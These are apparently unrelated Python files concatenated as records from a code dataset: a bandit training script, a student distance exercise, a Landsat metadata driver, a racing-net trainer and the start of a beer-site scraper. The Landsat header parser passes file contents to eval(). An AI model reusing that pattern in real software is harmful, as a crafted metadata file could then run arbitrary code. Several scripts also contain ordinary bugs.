np.random.rand(arms, arms)\n\n def reward(self, prob: float):\n reward = 0\n for i in range(self.arms):\n if random.random() < prob:\n reward += 1\n return reward\n\n def get_state(self):\n \"\"\"\n Returns a state sampled randomly from a uniform distribution.\n See the update_state function\n :return:\n \"\"\"\n return self.state\n\n def update_state(self):\n self.state = np.random.randint(0, self.arms)\n\n def get_reward(self, arm):\n return self.reward(self.bandit_matrix[self.get_state()][arm])\n\n\ndef train(env, network, epochs=5000, learning_rate=1e-2):\n \"\"\"\n Main training function.\n\n We initialize the current state randomly and transform into a one-hot-encoded tensor.\n In the training loop, we evaluate the model\n Once we enter the main training for loop, we’ll run our neural network model with the randomly\n initialized current state vector. It will return a vector that represents its\n guess for the values of each of the possible actions.\n\n At first, the model will output a bunch of random values since it is not trained.\n We’ll run the softmax function over the model’s output to generate a probability\n distribution over the actions. We’ll then select an action using the\n environment’s step(...) function, which will return the reward\n generated for taking that action; it will also update the environment’s current state.\n\n We turn the reward (which is a non-negative integer) into a one-hot vector that\n can be used as the training data. After that we run one step of backpropagation using this reward vector,\n for the state we gave the model. Since we’re using a neural network model as our\n action-value function, we no longer have any sort of action-value array storing “memories;”\n everything is being encoded in the neural network’s weight parameters.\n \n \"\"\"\n cur_state = torch.Tensor(build_one_hot_encoding(n=arms, pos=env.get_state()))\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n rewards = []\n softmax = SoftMaxPolicy(n_actions=N_ACTIONS, tau=TAU)\n\n for i in range(epochs):\n\n # get the predictions from the model\n y_pred = network(cur_state)\n\n # make a choice\n av_softmax = softmax.softmax_values(y_pred.data.numpy())\n av_softmax /= av_softmax.sum()\n choice = np.random.choice(arms, p=av_softmax)\n\n # step in the environment\n cur_reward = env.step(choice)\n\n one_hot_reward = y_pred.data.numpy().copy()\n one_hot_reward[choice] = cur_reward\n reward = torch.Tensor(one_hot_reward)\n rewards.append(cur_reward)\n loss = loss_fn(y_pred, reward)\n\n print(\"{0} On Episode={1} Loss={2}\".format(INFO, i, torch.mean((y_pred - reward)**2)))\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n cur_state = torch.Tensor(build_one_hot_encoding(arms, env.get_state()))\n return np.array(rewards)\n\n\nif __name__ == '__main__':\n\n arms = 10\n N, D_in, H, D_out = 1, arms, 100, arms\n\n # create a PyTorch model\n model = torch.nn.Sequential(\n torch.nn.Linear(D_in, H),\n torch.nn.ReLU(),\n torch.nn.Linear(H, D_out),\n torch.nn.ReLU(),\n )\n\n # loss function\n loss_fn = torch.nn.MSELoss()\n\n # set up the environment\n env = ContextBandit(arms)\n\n # train the model\n rewards = train(env=env, network=model)\n\n plt.plot(running_mean(rewards, N=500))\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Reward\")\n plt.show()\n", "repo_name": "pockerman/py_cube_ai", "sub_path": "src/examples/pytorch_examples/advertisement_placement.py", "file_name": "advertisement_placement.py", "file_ext": "py", "file_size_in_byte": 5922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.random", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 117, "usage_type": "call"}, {"api_name": "src.utils.array_utils.build_one_hot_encoding", "line_number": 117, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 118, "usage_type": "attribute"}, {"api_name": "src.policies.softmax_policy.SoftMaxPolicy", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 137, "usage_type": "call"}, {"api_name": "src.utils.INFO", "line_number": 141, "usage_type": "argument"}, {"api_name": "torch.mean", "line_number": 141, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 145, "usage_type": "call"}, {"api_name": "src.utils.array_utils.build_one_hot_encoding", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 146, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 155, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 155, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 157, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 157, "usage_type": "attribute"}, {"api_name": "torch.nn.Linear", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 159, "usage_type": "attribute"}, {"api_name": "torch.nn.MSELoss", "line_number": 163, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}]} +{"seq_id": "17439954586", "text": "# Aula 9 Exercicio 2 apostila\n# Queremos obter uma tabela ou gráfico da distância percorrida en função do tempo e o tempo total para chegar em 7 km, faça isto utilizando listas.\nprint('Lista de distâncias percorridas por uma corredora a cada 1min')\ncam = 5\nvel = 12\n\ndef min_hora(minu):\n h = minu / 60\n return(h)\n\ndef dist_cons(t, v):\n dmin = v * t\n return(dmin)\n\ndist2 = 0.2\nvel2 = 15\ndef dist_var(t,v0,v):\n dvar = (t/2)*(v-v0)\n return(dvar)\n\ndist_list = []\ndm = 0\ndist_list.append(0)\n\nwhile dm <= 7:\n\tif dm <=5:\n \tdm = dist_cons(min_hora(1), vel) + dm\n \tdist_list.append(dm)\n\n\telif dm > 5 and dm < 5.2:\n\t\tdm = dist_var(min_hora(1),vel,vel2) + dm\n\t\tdist_list.append(dm)\n\n\telse:\n\t\tdm = dist_cons(min_hora(1), vel2) + dm\n\t\tdist_list.append(dm)\n\ntime_list = []\nt = len(dist_list)\ntm = 0\nfor i in range(t):\n tm = tm + 1\n time_list.append(tm)\n\ns = len(dist_list)\nfor i in range(s):\n print(\"%.2f\" % dist_list[i]) #\"%.2f\" % reduz para duas casas decimais de incerteza.\n\nimport matplotlib.pyplot as plt\n\nplt.plot(time_list,dist_list)\nplt.xlabel(\"tempo min\")\nplt.ylabel(\"distância km\")\nplt.show()\nplt.close()\n\nprint('Fim!')\n\n", "repo_name": "jvictor42/PyUERJ-first-steps", "sub_path": "Exercicios apostila e exemplos/Aula9.2A.py", "file_name": "Aula9.2A.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "38314774282", "text": "# -*- coding: utf-8 -*-\r\n# Copyright (c) 2015 Australian Government, Department of the Environment\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in\r\n# all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\r\n# THE SOFTWARE.\r\n\r\n'''\r\nMetadata driver for Landsat geotiff imagery\r\n\r\nB{General info}:\r\n - U{http://www.ga.gov.au/remote-sensing/satellites-sensors/landsat}\r\n'''\r\n\r\nformat_regex=[r'L.*\\_MTL\\.txt$']# - Standard file names\r\n'''Regular expression list of file formats'''\r\n\r\n#import base dataset module\r\nimport __default__\r\n\r\n# import other modules (use \"_\" prefix to import privately)\r\nimport sys, os, re, glob, time, math, string\r\nfrom metageta import utilities, geometry, spatialreferences\r\n\r\ntry:\r\n from collections import OrderedDict\r\nexcept:\r\n from metageta.ordereddict import OrderedDict\r\n\r\ntry:\r\n from osgeo import gdal\r\n from osgeo import gdalconst\r\n from osgeo import osr\r\n from osgeo import ogr\r\nexcept ImportError:\r\n import gdal\r\n import gdalconst\r\n import osr\r\n import ogr\r\ngdal.AllRegister()\r\n\r\nclass Dataset(__default__.Dataset):\r\n '''Subclass of __default__.Dataset class so we get a load of metadata populated automatically'''\r\n def __init__(self,f):\r\n if f[:4]=='/vsi':raise NotImplementedError\r\n self.filelist = glob.glob(os.path.dirname(f)+'/*')\r\n def __getmetadata__(self):\r\n '''Read Metadata for a Landsat Geotiff with Level 1 Metadata format image as GDAL doesn't get it all.'''\r\n f=self.fileinfo['filepath']\r\n d=os.path.dirname(f)\r\n hdr=parseheader(f)\r\n\r\n if hdr['L1_METADATA_FILE'].get('LANDSAT_SCENE_ID'):self.__getnewmetadata__(f,d,hdr)\r\n else:self.__getoldmetadata__(f,d,hdr)\r\n\r\n md=self.metadata\r\n vrtxml=geometry.CreateSimpleVRT(self.bandfiles,md['cols'],md['rows'], md['datatype'])\r\n self._gdaldataset = geometry.OpenDataset(vrtxml)\r\n for i in range(self._gdaldataset.RasterCount):\r\n self._gdaldataset.GetRasterBand(i+1).SetNoDataValue(0)\r\n\r\n #Fix quicklook stretch for Landsat 8 data\r\n if md['satellite']=='LANDSAT_8':\r\n self._stretch=['PERCENT',[4,3,2],[1,99]]\r\n else:\r\n self._stretch=['PERCENT',[3,2,1], [2,98]]\r\n\r\n def __getnewmetadata__(self,f,d,hdr):\r\n '''Read Metadata for a Landsat Geotiff with new (>2012) Level 1 Metadata.'''\r\n\r\n #bands=[''.join(fnb.split('_')[3:]).replace('VCID','') for fnb in sorted(hdr['PRODUCT_METADATA'].keys()) if fnb.startswith('FILE_NAME_BAND')]\r\n #self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA'][fnb]) for fnb in sorted(hdr['PRODUCT_METADATA'].keys()) if fnb.startswith('FILE_NAME_BAND')]\r\n bands=[''.join(fnb.split('_')[3:]).replace('VCID','') for fnb in hdr['PRODUCT_METADATA'].keys() if fnb.startswith('FILE_NAME_BAND')]\r\n self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA'][fnb]) for fnb in hdr['PRODUCT_METADATA'].keys() if fnb.startswith('FILE_NAME_BAND')]\r\n\r\n __default__.Dataset.__getmetadata__(self, self.bandfiles[0])\r\n\r\n md=self.metadata\r\n md['metadata']=open(f).read().replace('\\x00','')\r\n md['sceneid']=hdr['L1_METADATA_FILE']['LANDSAT_SCENE_ID']\r\n md['filetype'] = 'GTIFF/Landsat MTL Geotiff'\r\n\r\n md['bands']=','.join(bands)\r\n md['nbands']=len(bands)\r\n md['level']=hdr['PRODUCT_METADATA']['DATA_TYPE']\r\n md['imgdate']='%sT%s'%(hdr['PRODUCT_METADATA']['DATE_ACQUIRED'],hdr['PRODUCT_METADATA']['SCENE_CENTER_TIME'][0:8]) #ISO 8601 format, strip off the milliseconds\r\n md['satellite']=hdr['PRODUCT_METADATA']['SPACECRAFT_ID']\r\n md['sensor']=hdr['PRODUCT_METADATA']['SENSOR_ID']\r\n md['demcorrection']=hdr['PRODUCT_METADATA'].get('ELEVATION_SOURCE','') #Level 1G isn't terrain corrected\r\n md['resampling']=hdr['PROJECTION_PARAMETERS']['RESAMPLING_OPTION']\r\n md['sunazimuth']=hdr['IMAGE_ATTRIBUTES']['SUN_AZIMUTH']\r\n md['sunelevation']=hdr['IMAGE_ATTRIBUTES']['SUN_ELEVATION']\r\n md['cloudcover']=hdr['IMAGE_ATTRIBUTES']['CLOUD_COVER']\r\n\r\n def __getoldmetadata__(self,f,d,hdr):\r\n '''Read Metadata for a Landsat Geotiff with ol (pre 2012) Level 1 Metadata.'''\r\n\r\n bands=sorted([i for i in hdr['PRODUCT_METADATA']['BAND_COMBINATION']])\r\n if hdr['PRODUCT_METADATA']['SENSOR_ID']=='ETM+': #Landsat 7 has 2 data files for thermal band 6\r\n #Format=123456678\r\n bands[5]=bands[5].replace('6','61')\r\n bands[6]=bands[6].replace('6','62')\r\n\r\n self.bandfiles=[os.path.join(d,hdr['PRODUCT_METADATA']['BAND%s_FILE_NAME'%b]) for b in bands]\r\n\r\n __default__.Dataset.__getmetadata__(self, self.bandfiles[0])\r\n\r\n md=self.metadata\r\n md['metadata']=open(f).read().replace('\\x00','')\r\n md['sceneid']=os.path.basename(d)\r\n md['filetype'] = 'GTIFF/Landsat MTL Geotiff'\r\n\r\n md['bands']=','.join(bands)\r\n md['nbands']=len(bands)\r\n md['level']=hdr['PRODUCT_METADATA']['PRODUCT_TYPE']\r\n md['imgdate']='%sT%s'%(hdr['PRODUCT_METADATA']['ACQUISITION_DATE'],hdr['PRODUCT_METADATA']['SCENE_CENTER_SCAN_TIME'][0:8]) #ISO 8601 format, strip off the milliseconds\r\n md['satellite']=hdr['PRODUCT_METADATA']['SPACECRAFT_ID']\r\n md['sensor']=hdr['PRODUCT_METADATA']['SENSOR_ID']\r\n md['demcorrection']=hdr['PRODUCT_METADATA'].get('ELEVATION_SOURCE','') #Level 1G isn't terrain corrected\r\n md['resampling']=hdr['PROJECTION_PARAMETERS']['RESAMPLING_OPTION']\r\n md['sunazimuth']=hdr['PRODUCT_PARAMETERS']['SUN_AZIMUTH']\r\n md['sunelevation']=hdr['PRODUCT_PARAMETERS']['SUN_ELEVATION']\r\n\r\ndef parseheader(f):\r\n ''' A simple header parser.\r\n\r\n @type f: C{str}\r\n @param f: Path to header file\r\n @rtype: C{dict}\r\n @return: Dictionary\r\n\r\n @todo:This function works for both landsat MTL and Digitalglobe IMD metadata\r\n files. Need to fix duplication - digitalglobe driver will need tweaking\r\n as it's version of the parser extracts band information.\r\n '''\r\n\r\n if f[:4]=='/vsi':\r\n lines=iter(geometry.read_vsi(f).splitlines())\r\n else:\r\n lines=iter(open(f).readlines())\r\n\r\n hdrdata=OrderedDict({})\r\n line=lines.next()\r\n while line:\r\n line=[item.strip() for item in line.replace('\"','').split('=')]\r\n group=line[0].upper()\r\n if group in ['END;','END']:break\r\n value=line[1]\r\n if group in ['END_GROUP']:pass\r\n elif group in ['BEGIN_GROUP','GROUP']:\r\n group=value\r\n subdata=OrderedDict({})\r\n while line:\r\n line=lines.next()\r\n line = [l.replace('\"','').strip() for l in line.split('=')]\r\n subgroup=line[0]\r\n subvalue=line[1]\r\n if subgroup == 'END_GROUP':\r\n break\r\n elif line[1] == '(':\r\n while line:\r\n line=lines.next()\r\n line = line.replace('\"','').strip()\r\n subvalue+=line\r\n if line[-1:]==';':\r\n subvalue=eval(subvalue.strip(';'))\r\n break\r\n else:subvalue=subvalue.strip(';')\r\n subdata[subgroup]=subvalue\r\n hdrdata[group]=subdata\r\n else: hdrdata[group]=value.strip(');')\r\n line=lines.next()\r\n return hdrdata\r\n\r\n\r\n", "repo_name": "lpinner/metageta", "sub_path": "metageta/formats/landsat_mtl.py", "file_name": "landsat_mtl.py", "file_ext": "py", "file_size_in_byte": 8408, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "gdal.AllRegister", "line_number": 54, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 56, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path", "line_number": 64, "usage_type": "attribute"}, {"api_name": "metageta.geometry.CreateSimpleVRT", "line_number": 71, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 71, "usage_type": "name"}, {"api_name": "metageta.geometry.OpenDataset", "line_number": 72, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 72, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "__default__.Dataset.__getmetadata__", "line_number": 90, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "__default__.Dataset.__getmetadata__", "line_number": 120, "usage_type": "call"}, {"api_name": "__default__.Dataset", "line_number": 120, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "metageta.geometry.read_vsi", "line_number": 152, "usage_type": "call"}, {"api_name": "metageta.geometry", "line_number": 152, "usage_type": "name"}, {"api_name": "metageta.ordereddict.OrderedDict", "line_number": 156, "usage_type": "call"}, {"api_name": "metageta.ordereddict.OrderedDict", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "31348158374", "text": "import time\nimport torch\nimport torch.nn as nn\nimport os\nimport csv\nfrom tqdm import tqdm\nfrom model import RacingNet\nfrom data import get_loaders\nfrom eval import calculate_speed_error, calculate_accuracy\n\nEXPERIMENT_NAME = \"test-run-2\"\nNUM_ITERS = int(1e4)\nEVAL_ITERS = 100\nCSV_FILE_PATH = 'data/dataset.csv'\nFRAMES_DIR = 'dataset/frames'\nBATCH_SIZE = 32\nEVAL_BATCHES = 10\nFREEZE_BACKBONE = True\nDECAY = 1 - 1.0 / 64\nLEARNING_RATE = 1e-4\n\nif os.path.exists(f'experiments/{EXPERIMENT_NAME}'):\n print(\"Please choose a new experiment name. This one already exists.\")\n exit()\n\n\ndef evaluate_model(model, val_loader, device):\n start = time.time()\n model.eval()\n batch_count = 0\n eval_size = 0\n total_loss = 0\n total_speed_error = 0\n total_gear_accuracy = 0\n total_samples = 0\n\n with torch.no_grad():\n for batch in val_loader:\n images, in_race, true_speed, true_position, true_lap, true_gear = batch\n images, in_race, true_speed, true_position, true_lap, true_gear = \\\n images.to(device), in_race.to(device), true_speed.to(device), \\\n true_position.to(device), true_lap.to(device), true_gear.to(device)\n\n pred_in_race, pred_speed, pred_position, pred_gear, pred_lap = model(images)\n\n # Calculate loss and metrics\n speed_loss = nn.MSELoss()(pred_speed.squeeze(), true_speed.float())\n gear_loss = nn.CrossEntropyLoss()(pred_gear, true_gear.long())\n total_loss = 10 * speed_loss + gear_loss\n speed_error = calculate_speed_error(pred_speed, true_speed)\n gear_accuracy = calculate_accuracy(pred_gear, true_gear)\n\n # Accumulate metrics\n total_loss += total_loss.item()\n total_speed_error += speed_error.item()\n total_gear_accuracy += gear_accuracy\n total_samples += images.shape[0]\n\n batch_count += 1\n eval_size += images.shape[0]\n if batch_count == EVAL_BATCHES:\n break\n\n # Return the average loss and metrics\n return total_loss / total_samples, total_speed_error / total_samples, total_gear_accuracy / total_samples, time.time() - start, eval_size\n\n\ndef train_model(model, optimizer, train_loader, val_loader, device):\n model.train()\n experiment_dir = f'experiments/{EXPERIMENT_NAME}'\n os.makedirs(experiment_dir, exist_ok=True)\n\n # Add this line to keep track of the lowest validation loss\n lowest_val_loss = float('inf')\n\n with open(os.path.join(experiment_dir, 'training_logs.csv'), 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile)\n # Add Timestamp and Batch Size in the header\n csv_writer.writerow(\n ['Iteration', 'Phase', 'Mean Loss', 'Speed Error', 'Gear Accuracy', 'Timestamp', 'Batch Size'])\n\n progress_bar = tqdm(total=NUM_ITERS, desc='Training')\n\n mean_loss = 0.0\n iter_count = 0\n mean_speed_loss = 0.0\n mean_gear_loss = 0.0\n mean_speed_error = 0.0\n mean_gear_accuracy = 0.0\n\n while iter_count < NUM_ITERS:\n for i, batch in enumerate(train_loader):\n images, in_race, true_speed, true_position, true_lap, true_gear = batch\n images, in_race, true_speed, true_position, true_lap, true_gear = \\\n images.to(device), in_race.to(device), true_speed.to(device), \\\n true_position.to(device), true_lap.to(device), true_gear.to(device)\n\n optimizer.zero_grad()\n\n pred_in_race, pred_speed, pred_position, pred_gear, pred_lap = model(images)\n\n # Calculate loss\n speed_loss = 5 * nn.MSELoss()(pred_speed.squeeze(), true_speed.float())\n gear_loss = nn.CrossEntropyLoss()(pred_gear, true_gear.long())\n total_loss = speed_loss + gear_loss\n speed_error = calculate_speed_error(pred_speed, true_speed).item()\n gear_accuracy = calculate_accuracy(pred_gear, true_gear)\n\n total_loss.backward()\n optimizer.step()\n\n # Update the exponential moving averages\n mean_loss = total_loss.item() if iter_count == 0 else (1 - DECAY) * total_loss.item() + DECAY * mean_loss\n mean_speed_loss = speed_loss if iter_count == 0 else (1 - DECAY) * speed_loss + DECAY * mean_speed_loss\n mean_gear_loss = gear_loss if iter_count == 0 else (1 - DECAY) * gear_loss + DECAY * mean_gear_loss\n mean_speed_error = speed_error if iter_count == 0 else (1 - DECAY) * speed_error + DECAY * mean_speed_error\n mean_gear_accuracy = gear_accuracy if iter_count == 0 else (1 - DECAY) * gear_accuracy + DECAY * mean_gear_accuracy\n\n progress_bar.set_postfix({\n 'loss': f'{mean_loss:.3f}',\n 'loss_speed': f'{mean_speed_loss:.3f}',\n 'loss_gear': f'{mean_gear_loss:.3f}',\n 'speed_err': f'{mean_speed_error:.2f}mph',\n 'gear_acc': f'{mean_gear_accuracy:.2%}',\n # 'eval_time': f'{eval_duration:.2f}s',\n # 'eval_size': f'{eval_size:.0f}'\n })\n progress_bar.update()\n\n # Write training metrics to CSV file with timestamp and batch size\n csv_writer.writerow([iter_count, 'training', total_loss.item(), speed_error, gear_accuracy,\n time.strftime('%Y-%m-%d %H:%M:%S'), images.shape[0]])\n iter_count += 1\n\n if iter_count % EVAL_ITERS == 0:\n # Evaluate on the validation set\n avg_val_loss, avg_val_speed_error, avg_val_gear_accuracy, eval_duration, eval_size = evaluate_model(\n model, val_loader, device)\n\n # Write validation metrics to CSV file with timestamp and batch size\n csv_writer.writerow(\n [iter_count, 'validation', avg_val_loss.item(), avg_val_speed_error, avg_val_gear_accuracy,\n time.strftime('%Y-%m-%d %H:%M:%S'), eval_size])\n\n # Save the model if the validation loss improves\n if avg_val_loss.item() < lowest_val_loss:\n lowest_val_loss = avg_val_loss.item()\n torch.save(model.state_dict(), os.path.join(experiment_dir, 'best_model.pth'))\n\n if iter_count >= NUM_ITERS:\n break\n\n # Save the last model\n torch.save(model.state_dict(), os.path.join(experiment_dir, 'last_model.pth'))\n progress_bar.close()\n\n\ndef main():\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n loaders = get_loaders(CSV_FILE_PATH, FRAMES_DIR, BATCH_SIZE)\n train_loader = loaders.get('train')\n val_loader = loaders.get('valid')\n\n model = RacingNet(freeze_backbone=FREEZE_BACKBONE).to(device)\n optimizer = torch.optim.AdamW(model.parameters(), lr=LEARNING_RATE)\n train_model(model, optimizer, train_loader, val_loader, device)\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "furkanhaney/racing-net", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 7207, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "model.eval", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 47, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 48, "usage_type": "name"}, {"api_name": "eval.calculate_speed_error", "line_number": 50, "usage_type": "call"}, {"api_name": "eval.calculate_accuracy", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 65, "usage_type": "call"}, {"api_name": "model.train", "line_number": 69, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "csv.writer", "line_number": 77, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "eval.calculate_speed_error", "line_number": 106, "usage_type": "call"}, {"api_name": "eval.calculate_accuracy", "line_number": 107, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 132, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 148, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 148, "usage_type": "call"}, {"api_name": "os.path", "line_number": 148, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 154, "usage_type": "call"}, {"api_name": "model.state_dict", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path", "line_number": 154, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 159, "usage_type": "attribute"}, {"api_name": "data.get_loaders", "line_number": 161, "usage_type": "call"}, {"api_name": "model.RacingNet", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.optim.AdamW", "line_number": 166, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 166, "usage_type": "attribute"}, {"api_name": "model.parameters", "line_number": 166, "usage_type": "call"}]} +{"seq_id": "19167007165", "text": "import sys\nimport os\nimport unittest\nimport urllib2\nimport re\nimport logging\nimport datetime\n\nfrom Review import Review\n\nclass Beer(object):\n \"\"\"\n metadata around a beer, and it's ratings\n \"\"\"\n beer_uri = \"http://www.ratebeer.com/beer/beer_name/{beer_id}/\"\n ratings_uri = \"http://www.ratebeer.com/Ratings-Who.asp?BeerID={beer_id}\"\n ratings_regex = re.compile(r'\\d*)\" target=\"_blank\">(.*?) \\(Rating - (.*?)\\)')\n\n reviews_regex = re.compile(r'
\\d\\.?\\d?) out of 5\\.0\">(?P=rating)
   AROMA (\\d\\d?)/10   APPEARANCE (\\d)/5   TASTE (\\d\\d?)/10   PALATE (\\d)/5   OVERALL (\\d\\d?)/20(\\S*?) \\(\\d*?\\)
- (.*?) - ([A-Z]{3} \\d\\d?, \\d{4}).*?
(.*?)

', flags=re.DOTALL)\n\n get_metadata = {'name': re.compile(r'
(.*?)
'),\n 'abv': re.compile(r'ABV: (.*?)%'),\n 'mean': re.compile(r'MEAN: (\\d\\.?\\d?)/5\\.0') ,\n 'weighted_score': re.compile(r'WEIGHTED AVG: \\d\\.?\\d*?/5'),\n 'overall_percentile': re.compile(r'
'),\n 'style_percentile': re.compile(r'
'),\n 'total_ratings': re.compile(r'RATINGS: (\\d+)'),\n 'brewery_and_style': re.compile(r'
(?:Brewed by )?.*?(?:
Brewed at .*)?

Style: .*?
.*?
